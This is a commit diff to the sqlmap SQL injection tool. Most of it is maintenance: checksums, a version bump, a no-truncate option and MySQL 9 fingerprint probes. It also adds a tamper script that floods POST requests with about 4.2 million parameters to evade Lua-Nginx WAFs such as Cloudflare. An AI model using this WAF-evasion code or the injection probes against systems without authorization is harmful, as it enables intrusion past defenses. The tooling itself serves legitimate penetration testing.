Minor update of fingerprint data for MySQL

* Add luanginxmore tamper script

POST requests can accept far more parameters than GET requests, so for additional evasion, it's nice to have something capable of overwhelming a WAF with millions of parameters, not just hundreds.

Tested against public bug bounty programs with great success.

* Fix syntax error

Oops, forgot an extra closing parenthesis

* Fix missing imports

data/txt/sha256sums.txt

@@ -149,7 +149,7 @@ f3d8033f8c451ae28ca4b8f65cf2ceb77fadba21f11f19229f08398cbf523bc6  extra/shutils/
 8779e1a56165327e49bbfd6cb2a461ab18cd8a83e9bfc139c9bdfc8e44f2a23f  extra/shutils/modernize.sh
 74fe683e94702bef6b8ea8eebb7fc47040e3ef5a03dec756e3cf4504a00c7839  extra/shutils/newlines.py
 fed05c468af662ba6ca6885baf8bf85fec1e58f438b3208f3819ad730a75a803  extra/shutils/postcommit-hook.sh
-dc35b51f5c9347eda8130106ee46bb051474fc0c5ed101f84abf3e546f729ceb  extra/shutils/precommit-hook.sh
+ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128  extra/shutils/precommit-hook.sh
 1909f0d510d0968fb1a6574eec17212b59081b2d7eb97399a80ba0dc0e77ddd1  extra/shutils/pycodestyle.sh
 026af5ba1055e85601dcdcb55bc9de41a6ee2b5f9265e750c878811c74dee2b0  extra/shutils/pydiatra.sh
 2ce9ac90e7d37a38b9d8dcc908632575a5bafc4c75d6d14611112d0eea418369  extra/shutils/pyflakes.sh
@@ -180,7 +180,7 @@ ec8d94fb704c0a40c88f5f283624cda025e2ea0e8b68722fe156c2b5676f53ac  lib/core/dicts
 93c256111dc753967169988e1289a0ea10ec77bfb8e2cbd1f6725e939bfbc235  lib/core/gui.py
 1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/core/__init__.py
 53499dc202a036289e3b2b9699d19568e794d077e16fd3a5c91771983de45451  lib/core/log.py
-bcb54f1813b3757fe717d7b4f3429fbcd08ff416af1100b716708955702e66d6  lib/core/optiondict.py
+79c6b0332efa7cdf752f5caad6bd81a78a0369f2c33c107d9aaeaf52edc7e6e7  lib/core/optiondict.py
 2f007b088aad979f75c4d864603dfc685da5be219ae116f2bb0d6445d2db4f83  lib/core/option.py
 81275fdbd463d89a2bfd8c00417a17a872aad74f34c18e44be79c0503e67dfa5  lib/core/patch.py
 e79df3790f16f67988e46f94b0a516d7ee725967f7698c8e17f210e4052203a7  lib/core/profiling.py
@@ -188,7 +188,7 @@ c6a182f6b7d3b0ad6f0888ea2a4de4148f0770549038d7de8bc3267b4c6635f7  lib/core/readl
 63ae69713c6ea9abfa10e71dfab8f2dcf42432177a38d2c1e98785bf1468674c  lib/core/replication.py
 5bad5bc7115051cef7b84efa73fbafbf5e1db46eef32a445056b56cda750b66f  lib/core/revision.py
 0dcb52c9c76a4b0acf2e9038f7d8f08c14543cef3cf7032831c6c0a99376ad24  lib/core/session.py
-13cb63f7e3c76e3251cd572b766b358389b5d997893aa649bf279169051270e8  lib/core/settings.py
+a6052d9b44717a8cb571cef68baea565551bfbd0d41578e2143b58f29f10ae53  lib/core/settings.py
 a1e4f2860bffc73bbf2e5db293fa49dcb600ea35f950cda43dc953b3160ab3db  lib/core/shell.py
 841716e87b90a3b598515910841f7cf8d33bb87c24a27fba1a80e36a831cbcd7  lib/core/subprocessng.py
 9731092f195e346716929323ea3c93247b23b9b92b0f32d3fd0acc3adf9876cc  lib/core/target.py
@@ -199,7 +199,7 @@ b1071f449a66b4ceacd4b84b33a73d9e0a3197d271d72daaa406ba473a8bb625  lib/core/testi
 12cbead4e9e563b970fafb891127927445bd53bada1fac323b9cd27da551ba30  lib/core/wordlist.py
 1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/__init__.py
 a027f4c44811cb74aa367525f353706de3d3fc719e6c6162f7a61dc838acf0c2  lib/parse/banner.py
-2838467a296a05c6c94ddef1f42f1e7cddee3a9e755143bcb70129233056abad  lib/parse/cmdline.py
+b157cdba54e722e97a22de35479bc9c3eeeb5658e6b5d8ff16a66776a3d520a4  lib/parse/cmdline.py
 3907765df08c31f8d59350a287e826bd315a7714dc0e87496f67c8a0879c86ac  lib/parse/configfile.py
 ced03337edd5a16b56a379c9ac47775895e1053003c25f6ba5bec721b6e3aa64  lib/parse/handler.py
 3704a02dcf00b0988b101e30b2e0d48acdd20227e46d8b552e46c55d7e9bf28c  lib/parse/headers.py
@@ -210,8 +210,8 @@ cbabdde72df4bd8d6961d589f1721dd938d8f653aa6af8900a31af6e2586405d  lib/parse/site
 87109063dd336fe2705fdfef23bc9b340dcc58e410f15c372fab51ea6a1bf4b1  lib/request/basicauthhandler.py
 89417568d7f19e48d39a8a9a4227d3d2b71d1c9f61139a41b1835fb5266fcab8  lib/request/basic.py
 6139b926a3462d14ddd50acdb8575ae442b8fab089db222721535092b9af3ea1  lib/request/chunkedhandler.py
-6058fc4fce4b5ce660096d341eab3ae170e5406b31e2e9f51dcf60e7a2b67e68  lib/request/comparison.py
-7345c12a0a1d4c583766b46ba38263cbc4603a85aa4216deddd62958d4e5d596  lib/request/connect.py
+6be5719f3c922682931779830a4571a13d5612a69e2423fd60a254e8dbceaf5c  lib/request/comparison.py
+b27dd003eba5ac4697b6a1d5a6712e6aca380436a5a379bd5f2e831d6dca19bd  lib/request/connect.py
 0649a39c5cc2fc0f4c062b100ced17e3e6934a7e578247dfc65b650edc29825e  lib/request/direct.py
 5283754cf387ce4e645ee50834ee387cde29a768aaada1a6a07c338da216c94d  lib/request/dns.py
 844fae318d6b3141bfc817aac7a29868497b5e7b4b3fdd7c751ad1d4a485324f  lib/request/httpshandler.py
@@ -236,11 +236,11 @@ ec77bee2f221157aff16ec518ca2f3f8359952cd0835f70dd6a5cd8d57caf5bc  lib/takeover/w
 1b8b4fe2088247f99b96ccab078a8bd72dc934d7bd155498eec2a77b67c55daf  lib/techniques/dns/test.py
 9120019b1a87e0df043e815817b8bfb9965bda6f6fa633dc667c940865bb830c  lib/techniques/dns/use.py
 1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/techniques/error/__init__.py
-5063c30a821da00d0935b4e6c2f668f35818c8a6c2005e2e0074f491366f7725  lib/techniques/error/use.py
+219871c68e5b67238ace9a8f46de0b267f4dd70fc02786a4a44de3bb95f8695b  lib/techniques/error/use.py
 1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/techniques/__init__.py
 1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  lib/techniques/union/__init__.py
 3349573564c035ef7c3dbca7da3aecde139f31621395a1a6a7d2eef1dccbb9b0  lib/techniques/union/test.py
-b781403433a2ad9a18fa9b1cc291165f04f734942268b4eba004a53afe8abe49  lib/techniques/union/use.py
+eb564696a2e0c8e8844c1593c77f7bb41e47ce89f213afe93cbba7f1190e91f0  lib/techniques/union/use.py
 c09927bccdbdb9714865c9a72d2a739da745375702a935349ddb9edc1d50de70  lib/utils/api.py
 1d72a586358c5f6f0b44b48135229742d2e598d40cefbeeabcb40a1c2e0b70b2  lib/utils/brute.py
 dd0b67fc2bdf65a4c22a029b056698672a6409eff9a9e55da6250907e8995728  lib/utils/crawler.py
@@ -342,14 +342,14 @@ ac17975286d2a01f6841ad05a7ccb2332bd2c672631c70bd7f3423aa8ad1b852  plugins/dbms/f
 e4e5ec5ffc77fb6697da01a0a5469cc3373b287a3e1f4d40efe8295625e8f333  plugins/dbms/h2/connector.py
 5b35fef7466bb0b99c6aa99c18b58e3005372bec99ce809cc068c72f87a950de  plugins/dbms/h2/enumeration.py
 f83219407b5134e9283baa1f1741d965f650cf165dbd0bad991dc1283e947572  plugins/dbms/h2/filesystem.py
-9ff278b87cf61bd301324b357ffb7ca6305f46d903ce5fd821b8d139357c1d14  plugins/dbms/h2/fingerprint.py
+294308fa97bedc3d4e6b0e09f2f23d9ccceb129e83f6f26790f433d73fc874ae  plugins/dbms/h2/fingerprint.py
 860696c2561a5d4c6d573c50a257e039bff77ffbc5119513d77089096b051fbc  plugins/dbms/h2/__init__.py
 95149998d4aa7751dfcd1653707b1f94503798f4ef719775a0fddd011742b2ba  plugins/dbms/h2/syntax.py
 8934c4fffc67f0080970bf007d0e2f25d6a79482cc2370673833f3cbe1f9f620  plugins/dbms/h2/takeover.py
 42d3fa136a67898c1908a3882baf128d15a48cd2cfe64054fa77038096e5bc0b  plugins/dbms/hsqldb/connector.py
 4c65b248cb0c2477ffaa9f337af698f6abc910907ef04f2b7ddc783dcc085f7a  plugins/dbms/hsqldb/enumeration.py
 d2581e9e2833b4232fcfc720f6d6638ec2254931f0905f0e281a4022d430c0f0  plugins/dbms/hsqldb/filesystem.py
-95ccbaa856cffc900e752a6e85779bf22feebab98035ba62b1ac93ac08da568e  plugins/dbms/hsqldb/fingerprint.py
+467eb72c43e70f34a440697ed5c9f5b78acc89d50dbb518388dbe53d22777ff3  plugins/dbms/hsqldb/fingerprint.py
 d175e63fd1c896a4c02e7e2b48d818108635c3b98a64a6068e1d4c814d2ce8ce  plugins/dbms/hsqldb/__init__.py
 95149998d4aa7751dfcd1653707b1f94503798f4ef719775a0fddd011742b2ba  plugins/dbms/hsqldb/syntax.py
 0aaa588c65e730320ab501b83b489db25f3f6cf20b5917bcdb9e9304df3419cb  plugins/dbms/hsqldb/takeover.py
@@ -399,7 +399,7 @@ f01e26e641fbfb3c3e7620c9cd87739a9a607fc66c56337ca02cc85479fb5f63  plugins/dbms/m
 36e706114f64097e185372aa97420f5267f7e1ccfc03968beda899cd6e32f226  plugins/dbms/mysql/connector.py
 96126e474f7c4e5581cabccff3e924c4789c8e2dbc74463ab7503ace08a88a3a  plugins/dbms/mysql/enumeration.py
 4c6af0e2202a080aa94be399a3d60cab97551ac42aa2bcc95581782f3cabc0c3  plugins/dbms/mysql/filesystem.py
-997be63891dab617a4abc5312f187c777964c912137a344d80c25a1bafe96e9e  plugins/dbms/mysql/fingerprint.py
+8f74a5eef2fc69850aec6d89bd30f1caf095c6ad2b09bec54d35c152c9090c22  plugins/dbms/mysql/fingerprint.py
 34dfa460e65be6f775b1d81906c97515a435f3dbadda57f5a928f7b87cefd97d  plugins/dbms/mysql/__init__.py
 eb59dd2ce04fa676375166549b532e0a5b6cb4c1666b7b2b780446d615aefb07  plugins/dbms/mysql/syntax.py
 05e1586c3a32ee8596adb48bec4588888883727b05a367a48adb6b86abea1188  plugins/dbms/mysql/takeover.py
@@ -476,8 +476,8 @@ b3d9d0644197ecb864e899c04ee9c7cd63891ecf2a0d3c333aad563eef735294  plugins/generi
 5a473c60853f54f1a4b14d79b8237f659278fe8a6b42e935ed573bf22b6d5b2c  README.md
 8c4fd81d84598535643cf0ef1b2d350cd92977cb55287e23993b76eaa2215c30  sqlmapapi.py
 168309215af7dd5b0b71070e1770e72f1cbb29a3d8025143fb8aa0b88cd56b62  sqlmapapi.yaml
-4037f1c78180550c1896543581c0c2423e970086bae46f175397f2b4c54b7323  sqlmap.conf
-3795c6d03bc341a0e3aef3d7990ea8c272d91a4c307e1498e850594375af39f7  sqlmap.py
+4121621b1accd6099eed095e9aa48d6db6a4fdfa3bbc5eb569d54c050132cbbf  sqlmap.conf
+f84846b8493d809d697a75b3d13d904013bbb03e0edd82b724f4753801609057  sqlmap.py
 9d408612a6780f7f50a7f7887f923ff3f40be5bfa09a951c6dc273ded05b56c0  tamper/0eunion.py
 c1c2eaa7df016cc7786ccee0ae4f4f363b1dce139c61fb3e658937cb0d18fc54  tamper/apostrophemask.py
 19023093ab22aec3bce9523f28e8111e8f6125973e6d9c82adb60da056bdf617  tamper/apostrophenullencode.py
@@ -511,6 +511,7 @@ d498e409c96d2ae2cc86263ead52ae385e95e9ec27f28247180c7c73ec348b3f  tamper/informa
 1d6e741e19e467650dce2ca84aa824d6df68ff74aedbe4afa8dbdb0193d94918  tamper/__init__.py
 b9a84211c84785361f4efa55858a1cdddd63cee644d0b8d4323b3a5e3db7d12f  tamper/least.py
 0de2bd766f883ac742f194f991c5d38799ffbf4346f4376be7ec8d750f2d9ef8  tamper/lowercase.py
+5015f35181dd4e4e0bddc67c4dfd86d6c509ae48a5f0212a122ff9a62f7352ce  tamper/luanginxmore.py
 c390d072ed48431ab5848d51b9ca5c4ff323964a770f0597bdde943ed12377f8  tamper/luanginx.py
 7eba10540514a5bfaee02e92b711e0f89ffe30b1672ec25c7680f2aa336c8a58  tamper/misunion.py
 b262da8d38dbb4be64d42e0ab07e25611da11c5d07aa11b09497b344a4c76b8d  tamper/modsecurityversioned.py

extra/shutils/precommit-hook.sh

@@ -24,7 +24,7 @@ git diff $SETTINGS_FULLPATH | grep "VERSION =" > /dev/null && exit 0
 
 if [ -f $SETTINGS_FULLPATH ]
 then
-    LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"')
+    LINE=$(grep -o ${SETTINGS_FULLPATH} -e '^VERSION = "[0-9.]*"')
     declare -a LINE
     INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.extend([0] * (4 - len(_))); _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
     if [ -n "$INCREMENTED" ]

lib/core/optiondict.py

@@ -253,6 +253,7 @@ optDict = {
         "disableHashing": "boolean",
         "listTampers": "boolean",
         "noLogging": "boolean",
+        "noTruncate": "boolean",
         "offline": "boolean",
         "purge": "boolean",
         "resultsFile": "string",

lib/core/settings.py

@@ -19,7 +19,7 @@ from lib.core.enums import OS
 from thirdparty import six
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.9.3.0"
+VERSION = "1.9.5.0"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -61,7 +61,7 @@ LOWER_RATIO_BOUND = 0.02
 UPPER_RATIO_BOUND = 0.98
 
 # For filling in case of dumb push updates
-DUMMY_JUNK = "ouZ0ii8A"
+DUMMY_JUNK = "ahy9Ouge"
 
 # Markers for special cases when parameter values contain html encoded characters
 PARAMETER_AMP_MARKER = "__AMP__"
@@ -835,6 +835,9 @@ INVALID_UNICODE_PRIVATE_AREA = False
 # Format used for representing invalid unicode characters
 INVALID_UNICODE_CHAR_FORMAT = r"\x%02x"
 
+# Minimum supported version of httpx library (for --http2)
+MIN_HTTPX_VERSION = "0.28"
+
 # Regular expression for XML POST data
 XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z"
 

lib/parse/cmdline.py

@@ -775,6 +775,9 @@ def cmdLineParser(argv=None):
         miscellaneous.add_argument("--no-logging", dest="noLogging", action="store_true",
             help="Disable logging to a file")
 
+        miscellaneous.add_argument("--no-truncate", dest="noTruncate", action="store_true",
+            help="Disable console output truncation (e.g. long entr...)")
+
         miscellaneous.add_argument("--offline", dest="offline", action="store_true",
             help="Work in offline mode (only use session data)")
 

lib/request/comparison.py

@@ -21,7 +21,9 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import SqlmapNoneDataException
+from lib.core.exception import SqlmapSilentQuitException
 from lib.core.settings import DEFAULT_PAGE_ENCODING
+from lib.core.settings import DEV_EMAIL_ADDRESS
 from lib.core.settings import DIFF_TOLERANCE
 from lib.core.settings import HTML_TITLE_REGEX
 from lib.core.settings import LOWER_RATIO_BOUND
@@ -35,8 +37,14 @@ from lib.core.threads import getCurrentThreadData
 from thirdparty import six
 
 def comparison(page, headers, code=None, getRatioValue=False, pageLength=None):
-    _ = _adjust(_comparison(page, headers, code, getRatioValue, pageLength), getRatioValue)
-    return _
+    try:
+        _ = _adjust(_comparison(page, headers, code, getRatioValue, pageLength), getRatioValue)
+        return _
+    except:
+        warnMsg = "there was a KNOWN issue inside the internals regarding the difflib/comparison of pages. "
+        warnMsg += "Please report details privately via e-mail to '%s'" % DEV_EMAIL_ADDRESS
+        logger.critical(warnMsg)
+        raise SqlmapSilentQuitException
 
 def _adjust(condition, getRatioValue):
     if not any((conf.string, conf.notString, conf.regexp, conf.code)):

lib/request/connect.py

@@ -62,6 +62,7 @@ from lib.core.common import unsafeVariableNaming
 from lib.core.common import urldecode
 from lib.core.common import urlencode
 from lib.core.common import wasLastResponseDelayed
+from lib.core.compat import LooseVersion
 from lib.core.compat import patchHeaders
 from lib.core.compat import xrange
 from lib.core.convert import encodeBase64
@@ -109,6 +110,7 @@ from lib.core.settings import IS_WIN
 from lib.core.settings import JAVASCRIPT_HREF_REGEX
 from lib.core.settings import LARGE_READ_TRIM_MARKER
 from lib.core.settings import LIVE_COOKIES_TIMEOUT
+from lib.core.settings import MIN_HTTPX_VERSION
 from lib.core.settings import MAX_CONNECTION_READ_SIZE
 from lib.core.settings import MAX_CONNECTIONS_REGEX
 from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
@@ -618,6 +620,9 @@ class Connect(object):
                     except ImportError:
                         raise SqlmapMissingDependence("httpx[http2] not available (e.g. 'pip%s install httpx[http2]')" % ('3' if six.PY3 else ""))
 
+                    if LooseVersion(httpx.__version__) < LooseVersion(MIN_HTTPX_VERSION):
+                        raise SqlmapMissingDependence("outdated version of httpx detected (%s<%s)" % (httpx.__version__, MIN_HTTPX_VERSION))
+
                     try:
                         proxy_mounts = dict(("%s://" % key, httpx.HTTPTransport(proxy="%s%s" % ("http://" if not "://" in kb.proxies[key] else "", kb.proxies[key]))) for key in kb.proxies) if kb.proxies else None
                         with httpx.Client(verify=False, http2=True, timeout=timeout, follow_redirects=True, cookies=conf.cj, mounts=proxy_mounts) as client:

lib/techniques/error/use.py

@@ -257,7 +257,7 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
             elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields):
                 status = "[%s] [INFO] %s: '%s'" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", output if kb.safeCharEncode else safecharencode(output))
 
-                if len(status) > width:
+                if len(status) > width and not conf.noTruncate:
                     status = "%s..." % status[:width - 3]
 
                 dataToStdout("%s\n" % status)

lib/techniques/union/use.py

@@ -418,7 +418,7 @@ def unionUse(expression, unpack=True, dump=False):
                                     _ = ','.join("'%s'" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, six.string_types) else [items]))
                                     status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
 
-                                    if len(status) > width:
+                                    if len(status) > width and not conf.noTruncate:
                                         status = "%s..." % status[:width - 3]
 
                                     dataToStdout("%s\n" % status)

plugins/dbms/h2/fingerprint.py

@@ -93,7 +93,7 @@ class Fingerprint(GenericFingerprint):
             infoMsg = "confirming %s" % DBMS.H2
             logger.info(infoMsg)
 
-            result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3")
+            result = inject.checkBooleanExpression("LEAST(ROUNDMAGIC(PI()),3)=3")
 
             if not result:
                 warnMsg = "the back-end DBMS is not %s" % DBMS.H2

plugins/dbms/hsqldb/fingerprint.py

@@ -99,7 +99,7 @@ class Fingerprint(GenericFingerprint):
             infoMsg = "confirming %s" % DBMS.HSQLDB
             logger.info(infoMsg)
 
-            result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3")
+            result = inject.checkBooleanExpression("LEAST(ROUNDMAGIC(PI()),3)=3")
 
             if not result:
                 warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB

plugins/dbms/mysql/fingerprint.py

@@ -45,9 +45,10 @@ class Fingerprint(GenericFingerprint):
         # Reference: https://dev.mysql.com/doc/relnotes/mysql/<major>.<minor>/en/
 
         versions = (
+            (90200, 90202),  # MySQL 9.2
             (90100, 90102),  # MySQL 9.1
             (90000, 90002),  # MySQL 9.0
-            (80400, 80404),  # MySQL 8.4
+            (80400, 80405),  # MySQL 8.4
             (80300, 80302),  # MySQL 8.3
             (80200, 80202),  # MySQL 8.2
             (80100, 80102),  # MySQL 8.1
@@ -207,8 +208,14 @@ class Fingerprint(GenericFingerprint):
 
             kb.data.has_information_schema = True
 
+            # Determine if it is MySQL >= 9.0.0
+            if inject.checkBooleanExpression("ISNULL(VECTOR_DIM(NULL))"):
+                Backend.setVersion(">= 9.0.0")
+                setDbms("%s 9" % DBMS.MYSQL)
+                self.getBanner()
+
             # Determine if it is MySQL >= 8.0.0
-            if inject.checkBooleanExpression("ISNULL(JSON_STORAGE_FREE(NULL))"):
+            elif inject.checkBooleanExpression("ISNULL(JSON_STORAGE_FREE(NULL))"):
                 Backend.setVersion(">= 8.0.0")
                 setDbms("%s 8" % DBMS.MYSQL)
                 self.getBanner()

sqlmap.conf

@@ -873,6 +873,10 @@ listTampers = False
 # Valid: True or False
 noLogging = False
 
+# Disable console output truncation.
+# Valid: True or False
+noTruncate = False
+
 # Work in offline mode (only use session data)
 # Valid: True or False
 offline = False

sqlmap.py

@@ -543,7 +543,7 @@ def main():
         errMsg = maskSensitiveData(errMsg)
         excMsg = maskSensitiveData(excMsg)
 
-        if conf.get("api") or not valid:
+        if conf.get("api") or not valid or kb.lastCtrlCTime:
             logger.critical("%s\n%s" % (errMsg, excMsg))
         else:
             logger.critical(errMsg)

tamper/luanginxmore.py

@@ -0,0 +1,39 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import random
+import string
+import os
+
+from lib.core.compat import xrange
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import HINT
+from lib.core.enums import PRIORITY
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
+
+__priority__ = PRIORITY.HIGHEST
+
+def dependencies():
+    singleTimeWarnMessage("tamper script '%s' is only meant to be run on POST requests" % (os.path.basename(__file__).split(".")[0]))
+
+def tamper(payload, **kwargs):
+    """
+    LUA-Nginx WAFs Bypass (e.g. Cloudflare) with 4.2 million parameters
+
+    Reference:
+        * https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/
+
+    Notes:
+        * Lua-Nginx WAFs do not support processing of huge number of parameters
+    """
+
+    hints = kwargs.get("hints", {})
+    delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER)
+
+    hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(4194304))
+
+    return payload